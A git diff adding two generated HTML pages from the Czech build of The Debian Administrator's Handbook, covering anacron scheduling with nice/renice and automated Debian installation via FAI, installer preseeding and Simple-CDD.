diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html
new file mode 100644
index 000000000..1a62089c7
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.asynchronous-task-scheduling-anacron.html
@@ -0,0 +1,131 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.8. Scheduling Asynchronous Tasks: anacron</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.task-scheduling-cron-atd.html"
+        title="9.7. Scheduling Tasks with cron and atd" /><link
+        rel="next"
+        href="sect.quotas.html"
+        title="9.9. Quotas" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.asynchronous-task-scheduling-anacron.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.task-scheduling-cron-atd.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quotas.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.asynchronous-task-scheduling-anacron"></a>9.8. Scheduling Asynchronous Tasks: <code
+                  class="command">anacron</code></h2></div></div></div><div
+          class="para">
+			<code
+            class="command">anacron</code> is the daemon that completes <code
+            class="command">cron</code> for computers that are not on at all times. Since regular tasks are usually scheduled for the middle of the night, they will never be executed if the computer is off at that time. The purpose of <code
+            class="command">anacron</code> is to execute them, taking into account periods in which the computer is not working.
+		</div><a
+          id="id-1.12.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Please note that <code
+            class="command">anacron</code> will frequently execute such activity a few minutes after booting the machine, which can render the computer less responsive. This is why the tasks in the <code
+            class="filename">/etc/anacrontab</code> file are started with the <code
+            class="command">nice</code> command, which reduces their execution priority and thus limits their impact on the rest of the system. Beware, the format of this file is not the same as that of <code
+            class="filename">/etc/crontab</code>; if you have particular needs for <code
+            class="command">anacron</code>, see the <span
+            class="citerefentry"><span
+              class="refentrytitle">anacrontab</span>(5)</span> manual page.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Priorities and <code
+                      class="command">nice</code></strong></p></div></div></div><div
+            class="para">
+			Unix systems (and thus Linux) are multi-tasking and multi-user systems. Indeed, several processes can run in parallel, and be owned by different users: the kernel mediates access to the resources between the different processes. As a part of this task, it has a concept of priority, which allows it to favor certain processes over others, as needed. When you know that a process can run in low priority, you can indicate so by running it with <code
+              class="command">nice <em
+                class="replaceable">program</em></code>. The program will then have a smaller share of the CPU, and will have a smaller impact on other running processes. Of course, if no other processes needs to run, the program will not be artificially held back.
+		</div><div
+            class="para">
+			<code
+              class="command">nice</code> works with levels of “niceness”: the positive levels (from 1 to 19) progressively lower the priority, while the negative levels (from -1 to -20) will increase it — but only root can use these negative levels. Unless otherwise indicated (see the <span
+              class="citerefentry"><span
+                class="refentrytitle">nice</span>(1)</span> manual page), <code
+              class="command">nice</code> increases the current level by 10.
+		</div><div
+            class="para">
+			If you discover that an already running task should have been started with <code
+              class="command">nice</code> it is not too late to fix it; the <code
+              class="command">renice</code> command changes the priority of an already running process, in either direction (but reducing the “niceness” of a process is reserved for the root user).
+		</div></div><div
+          class="para">
+			Installation of the <span
+            class="pkg pkg">anacron</span> package deactivates execution by <code
+            class="command">cron</code> of the scripts in the <code
+            class="filename">/etc/cron.hourly/</code>, <code
+            class="filename">/etc/cron.daily/</code>, <code
+            class="filename">/etc/cron.weekly/</code>, and <code
+            class="filename">/etc/cron.monthly/</code> directories. This avoids their double execution by <code
+            class="command">anacron</code> and <code
+            class="command">cron</code>. The <code
+            class="command">cron</code> command remains active and will continue to handle the other scheduled tasks (especially those scheduled by users).
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.task-scheduling-cron-atd.html"><strong>Předcházející</strong>9.7. Scheduling Tasks with cron and atd</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quotas.html"><strong>Další</strong>9.9. Quotas</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html
new file mode 100644
index 000000000..b8a468e63
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automated-installation.html
@@ -0,0 +1,533 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">12.3. Automated Installation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="RAID, LVM, FAI, Preseeding, Monitoring, Virtualization, Xen, LXC" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><link
+        rel="prev"
+        href="sect.virtualization.html"
+        title="12.2. Virtualization" /><link
+        rel="next"
+        href="sect.monitoring.html"
+        title="12.4. Monitoring" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.automated-installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtualization.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.monitoring.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.automated-installation"></a>12.3. Automated Installation</h2></div></div></div><a
+          id="id-1.15.6.2"
+          class="indexterm"></a><a
+          id="id-1.15.6.3"
+          class="indexterm"></a><div
+          class="para">
+			The Falcot Corp administrators, like many administrators of large IT services, need tools to install (or reinstall) quickly, and automatically if possible, their new machines.
+		</div><div
+          class="para">
+			These requirements can be met by a wide range of solutions. On the one hand, generic tools such as SystemImager handle this by creating an image based on a template machine, then deploy that image to the target systems; at the other end of the spectrum, the standard Debian installer can be preseeded with a configuration file giving the answers to the questions asked during the installation process. As a sort of middle ground, a hybrid tool such as FAI (<span
+            class="emphasis"><em>Fully Automatic Installer</em></span>) installs machines using the packaging system, but it also uses its own infrastructure for tasks that are more specific to massive deployments (such as starting, partitioning, configuration and so on).
+		</div><div
+          class="para">
+			Each of these solutions has its pros and cons: SystemImager works independently from any particular packaging system, which allows it to manage large sets of machines using several distinct Linux distributions. It also includes an update system that doesn't require a reinstallation, but this update system can only be reliable if the machines are not modified independently; in other words, the user must not update any software on their own, or install any other software. Similarly, security updates must not be automated, because they have to go through the centralized reference image maintained by SystemImager. This solution also requires the target machines to be homogeneous, otherwise many different images would have to be kept and managed (an i386 image won't fit on a powerpc machine, and so on).
+		</div><div
+          class="para">
+			On the other hand, an automated installation using debian-installer can adapt to the specifics of each machine: the installer will fetch the appropriate kernel and software packages from the relevant repositories, detect available hardware, partition the whole hard disk to take advantage of all the available space, install the corresponding Debian system, and set up an appropriate bootloader. However, the standard installer will only install standard Debian versions, with the base system and a set of pre-selected “tasks”; this precludes installing a particular system with non-packaged applications. Fulfilling this particular need requires customizing the installer… Fortunately, the installer is very modular, and there are tools to automate most of the work required for this customization, most importantly simple-CDD (CDD being an acronym for <span
+            class="emphasis"><em>Custom Debian Derivative</em></span>). Even the simple-CDD solution, however, only handles initial installations; this is usually not a problem since the APT tools allow efficient deployment of updates later on.
+		</div><div
+          class="para">
+			We will only give a rough overview of FAI, and skip SystemImager altogether (which is no longer in Debian), in order to focus more intently on debian-installer and simple-CDD, which are more interesting in a Debian-only context.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fai"></a>12.3.1. Fully Automatic Installer (FAI)</h3></div></div></div><a
+            id="id-1.15.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="foreignphrase"><em
+                class="foreignphrase">Fully Automatic Installer</em></span> is probably the oldest automated deployment system for Debian, which explains its status as a reference; but its very flexible nature only just compensates for the complexity it involves.
+			</div><div
+            class="para">
+				FAI requires a server system to store deployment information and allow target machines to boot from the network. This server requires the <span
+              class="pkg pkg">fai-server</span> package (or <span
+              class="pkg pkg">fai-quickstart</span>, which also brings the required elements for a standard configuration).
+			</div><div
+            class="para">
+				FAI uses a specific approach for defining the various installable profiles. Instead of simply duplicating a reference installation, FAI is a full-fledged installer, fully configurable via a set of files and scripts stored on the server; the default location <code
+              class="filename">/srv/fai/config/</code> is not automatically created, so the administrator needs to create it along with the relevant files. Most of the times, these files will be customized from the example files available in the documentation for the <span
+              class="pkg pkg">fai-doc</span> package, more particularly the <code
+              class="filename">/usr/share/doc/fai-doc/examples/simple/</code> directory.
+			</div><div
+            class="para">
+				Once the profiles are defined, the <code
+              class="command">fai-setup</code> command generates the elements required to start an FAI installation; this mostly means preparing or updating a minimal system (NFS-root) used during installation. An alternative is to generate a dedicated boot CD with <code
+              class="command">fai-cd</code>.
+			</div><div
+            class="para">
+				Creating all these configuration files requires some understanding of the way FAI works. A typical installation process is made of the following steps:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						fetching a kernel from the network, and booting it;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mounting the root filesystem from NFS;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						executing <code
+                    class="command">/usr/sbin/fai</code>, which controls the rest of the process (the next steps are therefore initiated by this script);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						copying the configuration space from the server into <code
+                    class="filename">/fai/</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						running <code
+                    class="command">fai-class</code>. The <code
+                    class="filename">/fai/class/[0-9][0-9]*</code> scripts are executed in turn, and return names of “classes” that apply to the machine being installed; this information will serve as a base for the following steps. This allows for some flexibility in defining the services to be installed and configured.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						fetching a number of configuration variables, depending on the relevant classes;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						partitioning the disks and formatting the partitions, based on information provided in <code
+                    class="filename">/fai/disk_config/<em
+                      class="replaceable">class</em></code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mounting said partitions;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						installing the base system;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						preseeding the Debconf database with <code
+                    class="command">fai-debconf</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						fetching the list of available packages for APT;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						installing the packages listed in <code
+                    class="filename">/fai/package_config/<em
+                      class="replaceable">class</em></code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						executing the post-configuration scripts, <code
+                    class="filename">/fai/scripts/<em
+                      class="replaceable">class</em>/[0-9][0-9]*</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						recording the installation logs, unmounting the partitions, and rebooting.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.d-i-preseeding"></a>12.3.2. Preseeding Debian-Installer</h3></div></div></div><a
+            id="id-1.15.6.10.2"
+            class="indexterm"></a><a
+            id="id-1.15.6.10.3"
+            class="indexterm"></a><div
+            class="para">
+				At the end of the day, the best tool to install Debian systems should logically be the official Debian installer. This is why, right from its inception, debian-installer has been designed for automated use, taking advantage of the infrastructure provided by <span
+              class="pkg pkg">debconf</span>. The latter allows, on the one hand, to reduce the number of questions asked (hidden questions will use the provided default answer), and on the other hand, to provide the default answers separately, so that installation can be non-interactive. This last feature is known as <span
+              class="emphasis"><em>preseeding</em></span>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Debconf with a centralized database</strong></p></div></div></div><a
+              id="id-1.15.6.10.5.2"
+              class="indexterm"></a><div
+              class="para">
+				Preseeding allows to provide a set of answers to Debconf questions at installation time, but these answers are static and do not evolve as time passes. Since already-installed machines may need upgrading, and new answers may become required, the <code
+                class="filename">/etc/debconf.conf</code> configuration file can be set up so that Debconf uses external data sources (such as an LDAP directory server, or a remote file accessed via NFS or Samba). Several external data sources can be defined at the same time, and they complement one another. The local database is still used (for read-write access), but the remote databases are usually restricted to reading. The <span
+                class="citerefentry"><span
+                  class="refentrytitle">debconf.conf</span>(5)</span> manual page describes all the possibilities in detail (you need the <span
+                class="pkg pkg">debconf-doc</span> package).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.6"></a>12.3.2.1. Using a Preseed File</h4></div></div></div><div
+              class="para">
+					There are several places where the installer can get a preseeding file:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							in the initrd used to start the machine; in this case, preseeding happens at the very beginning of the installation, and all questions can be avoided. The file just needs to be called <code
+                      class="filename">preseed.cfg</code> and stored in the initrd root.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							on the boot media (CD or USB key); preseeding then happens as soon as the media is mounted, which means right after the questions about language and keyboard layout. The <code
+                      class="literal">preseed/file</code> boot parameter can be used to indicate the location of the preseeding file (for instance, <code
+                      class="filename">/cdrom/preseed.cfg</code> when the installation is done off a CD-ROM, or <code
+                      class="filename">/hd-media/preseed.cfg</code> in the USB-key case).
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							from the network; preseeding then only happens after the network is (automatically) configured; the relevant boot parameter is then <code
+                      class="literal">preseed/url=http://<em
+                        class="replaceable">server</em>/preseed.cfg</code>.
+						</div></li></ul></div><div
+              class="para">
+					At a glance, including the preseeding file in the initrd looks like the most interesting solution; however, it is rarely used in practice, because generating an installer initrd is rather complex. The other two solutions are much more common, especially since boot parameters provide another way to preseed the answers to the first questions of the installation process. The usual way to save the bother of typing these boot parameters by hand at each installation is to save them into the configuration for <code
+                class="command">isolinux</code> (in the CD-ROM case) or <code
+                class="command">syslinux</code> (USB key).
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.7"></a>12.3.2.2. Creating a Preseed File</h4></div></div></div><div
+              class="para">
+					A preseed file is a plain text file, where each line contains the answer to one Debconf question. A line is split across four fields separated by whitespace (spaces or tabs), as in, for instance, <code
+                class="literal">d-i mirror/suite string stable</code>:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the first field is the “owner” of the question; “d-i” is used for questions relevant to the installer, but it can also be a package name for questions coming from Debian packages;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the second field is an identifier for the question;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							third, the type of question;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the fourth and last field contains the value for the answer. Note that it must be separated from the third field with a single space; if there are more than one, the following space characters are considered part of the value.
+						</div></li></ul></div><div
+              class="para">
+					The simplest way to write a preseed file is to install a system by hand. Then <code
+                class="command">debconf-get-selections --installer</code> will provide the answers concerning the installer. Answers about other packages can be obtained with <code
+                class="command">debconf-get-selections</code>. However, a cleaner solution is to write the preseed file by hand, starting from an example and the reference documentation: with such an approach, only questions where the default answer needs to be overridden can be preseeded; using the <code
+                class="literal">priority=critical</code> boot parameter will instruct Debconf to only ask critical questions, and use the default answer for others.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> Installation guide appendix</strong></p></div></div></div><div
+                class="para">
+					The installation guide, available online, includes detailed documentation on the use of a preseed file in an appendix. It also includes a detailed and commented sample file, which can serve as a base for local customizations. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/amd64/apb.html">https://www.debian.org/releases/jessie/amd64/apb.html</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/example-preseed.txt">https://www.debian.org/releases/jessie/example-preseed.txt</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.10.8"></a>12.3.2.3. Creating a Customized Boot Media</h4></div></div></div><div
+              class="para">
+					Knowing where to store the preseed file is all very well, but the location isn't everything: one must, one way or another, alter the installation boot media to change the boot parameters and add the preseed file.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.3"></a>12.3.2.3.1. Booting From the Network</h5></div></div></div><div
+                class="para">
+						When a computer is booted from the network, the server sending the initialization elements also defines the boot parameters. Thus, the change needs to be made in the PXE configuration for the boot server; more specifically, in its <code
+                  class="filename">/tftpboot/pxelinux.cfg/default</code> configuration file. Setting up network boot is a prerequisite; see the Installation Guide for details. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://www.debian.org/releases/jessie/amd64/ch04s05.html">https://www.debian.org/releases/jessie/amd64/ch04s05.html</a></div>
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.4"></a>12.3.2.3.2. Preparing a Bootable USB Key</h5></div></div></div><div
+                class="para">
+						Once a bootable key has been prepared (see <a
+                  class="xref"
+                  href="installation.html#sect.install-usb">4.1.2 – „Booting from a USB Key“</a>), a few extra operations are needed. Assuming the key contents are available under <code
+                  class="filename">/media/usbdisk/</code>:
+					</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+								copy the preseed file to <code
+                        class="filename">/media/usbdisk/preseed.cfg</code>
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								edit <code
+                        class="filename">/media/usbdisk/syslinux.cfg</code> and add required boot parameters (see example below).
+							</div></li></ul></div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.15.6.10.8.4.4"></a><p
+                  class="title"><strong>Příklad 12.2. syslinux.cfg file and preseeding parameters</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">default vmlinuz
+append preseed/file=/hd-media/preseed.cfg locale=en_US.UTF-8 keymap=us language=us country=US vga=788 initrd=initrd.gz  --
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.15.6.10.8.5"></a>12.3.2.3.3. Creating a CD-ROM Image</h5></div></div></div><a
+                id="id-1.15.6.10.8.5.2"
+                class="indexterm"></a><div
+                class="para">
+						A USB key is a read-write media, so it was easy for us to add a file there and change a few parameters. In the CD-ROM case, the operation is more complex, since we need to regenerate a full ISO image. This task is handled by <span
+                  class="pkg pkg">debian-cd</span>, but this tool is rather awkward to use: it needs a local mirror, and it requires an understanding of all the options provided by <code
+                  class="filename">/usr/share/debian-cd/CONF.sh</code>; even then, <code
+                  class="command">make</code> must be invoked several times. <code
+                  class="filename">/usr/share/debian-cd/README</code> is therefore a very recommended read.
+					</div><div
+                class="para">
+						Having said that, debian-cd always operates in a similar way: an “image” directory with the exact contents of the CD-ROM is generated, then converted to an ISO file with a tool such as <code
+                  class="command">genisoimage</code>, <code
+                  class="command">mkisofs</code> or <code
+                  class="command">xorriso</code>. The image directory is finalized after debian-cd's <code
+                  class="command">make image-trees</code> step. At that point, we insert the preseed file into the appropriate directory (usually <code
+                  class="filename">$TDIR/$CODENAME/CD1/</code>, $TDIR and $CODENAME being parameters defined by the <code
+                  class="filename">CONF.sh</code> configuration file). The CD-ROM uses <code
+                  class="command">isolinux</code> as its bootloader, and its configuration file must be adapted from what debian-cd generated, in order to insert the required boot parameters (the specific file is <code
+                  class="filename">$TDIR/$CODENAME/boot1/isolinux/isolinux.cfg</code>). Then the “normal” process can be resumed, and we can go on to generating the ISO image with <code
+                  class="command">make image CD=1</code> (or <code
+                  class="command">make images</code> if several CD-ROMs are generated).
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.simple-cdd"></a>12.3.3. Simple-CDD: The All-In-One Solution</h3></div></div></div><a
+            id="id-1.15.6.11.2"
+            class="indexterm"></a><div
+            class="para">
+				Simply using a preseed file is not enough to fulfill all the requirements that may appear for large deployments. Even though it is possible to execute a few scripts at the end of the normal installation process, the selection of the set of packages to install is still not quite flexible (basically, only “tasks” can be selected); more important, this only allows installing official Debian packages, and precludes locally-generated ones.
+			</div><div
+            class="para">
+				On the other hand, debian-cd is able to integrate external packages, and debian-installer can be extended by inserting new steps in the installation process. By combining these capabilities, it should be possible to create a customized installer that fulfills our needs; it should even be able to configure some services after unpacking the required packages. Fortunately, this is not a mere hypothesis, since this is exactly what Simple-CDD (in the <span
+              class="pkg pkg">simple-cdd</span> package) does.
+			</div><div
+            class="para">
+				The purpose of Simple-CDD is to allow anyone to easily create a distribution derived from Debian, by selecting a subset of the available packages, preconfiguring them with Debconf, adding specific software, and executing custom scripts at the end of the installation process. This matches the “universal operating system” philosophy, since anyone can adapt it to their own needs.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.6"></a>12.3.3.1. Creating Profiles</h4></div></div></div><div
+              class="para">
+					Simple-CDD defines “profiles” that match the FAI “classes” concept, and a machine can have several profiles (determined at installation time). A profile is defined by a set of <code
+                class="filename">profiles/<em
+                  class="replaceable">profile</em>.*</code> files:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.description</code> file contains a one-line description for the profile;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.packages</code> file lists packages that will automatically be installed if the profile is selected;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.downloads</code> file lists packages that will be stored onto the installation media, but not necessarily installed;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.preseed</code> file contains preseeding information for Debconf questions (for the installer and/or for packages);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="filename">.postinst</code> file contains a script that will be run at the end of the installation process;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							lastly, the <code
+                      class="filename">.conf</code> file allows changing some Simple-CDD parameters based on the profiles to be included in an image.
+						</div></li></ul></div><div
+              class="para">
+					The <code
+                class="literal">default</code> profile has a particular role, since it is always selected; it contains the bare minimum required for Simple-CDD to work. The only thing that is usually customized in this profile is the <code
+                class="literal">simple-cdd/profiles</code> preseed parameter: this allows avoiding the question, introduced by Simple-CDD, about what profiles to install.
+				</div><div
+              class="para">
+					Note also that the commands will need to be invoked from the parent directory of the <code
+                class="filename">profiles</code> directory.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.7"></a>12.3.3.2. Configuring and Using <code
+                      class="command">build-simple-cdd</code></h4></div></div></div><a
+              id="id-1.15.6.11.7.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> Detailed configuration file</strong></p></div></div></div><div
+                class="para">
+					An example of a Simple-CDD configuration file, with all possible parameters, is included in the package (<code
+                  class="filename">/usr/share/doc/simple-cdd/examples/simple-cdd.conf.detailed.gz</code>). This can be used as a starting point when creating a custom configuration file.
+				</div></div><div
+              class="para">
+					Simple-CDD requires many parameters to operate fully. They will most often be gathered in a configuration file, which <code
+                class="command">build-simple-cdd</code> can be pointed at with the <code
+                class="literal">--conf</code> option, but they can also be specified via dedicated parameters given to <code
+                class="command">build-simple-cdd</code>. Here is an overview of how this command behaves, and how its parameters are used:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							the <code
+                      class="literal">profiles</code> parameter lists the profiles that will be included on the generated CD-ROM image;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							based on the list of required packages, Simple-CDD downloads the appropriate files from the server mentioned in <code
+                      class="literal">server</code>, and gathers them into a partial mirror (which will later be given to debian-cd);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							the custom packages mentioned in <code
+                      class="literal">local_packages</code> are also integrated into this local mirror;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							debian-cd is then executed (within a default location that can be configured with the <code
+                      class="literal">debian_cd_dir</code> variable), with the list of packages to integrate;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							once debian-cd has prepared its directory, Simple-CDD applies some changes to this directory:
+						</div><div
+                    class="itemizedlist"><ul><li
+                        class="listitem"><div
+                          class="para">
+									files containing the profiles are added in a <code
+                            class="filename">simple-cdd</code> subdirectory (that will end up on the CD-ROM);
+								</div></li><li
+                        class="listitem"><div
+                          class="para">
+									other files listed in the <code
+                            class="literal">all_extras</code> parameter are also added;
+								</div></li><li
+                        class="listitem"><div
+                          class="para">
+									the boot parameters are adjusted so as to enable the preseeding. Questions concerning language and country can be avoided if the required information is stored in the <code
+                            class="literal">language</code> and <code
+                            class="literal">country</code> variables.
+								</div></li></ul></div></li><li
+                  class="listitem"><div
+                    class="para">
+							debian-cd then generates the final ISO image.
+						</div></li></ul></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.6.11.8"></a>12.3.3.3. Generating an ISO Image</h4></div></div></div><div
+              class="para">
+					Once we have written a configuration file and defined our profiles, the remaining step is to invoke <code
+                class="command">build-simple-cdd --conf simple-cdd.conf</code>. After a few minutes, we get the required image in <code
+                class="filename">images/debian-8.0-amd64-CD-1.iso</code>.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtualization.html"><strong>Předcházející</strong>12.2. Virtualization</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.monitoring.html"><strong>Další</strong>12.4. Monitoring</a></li></ul></body></html>
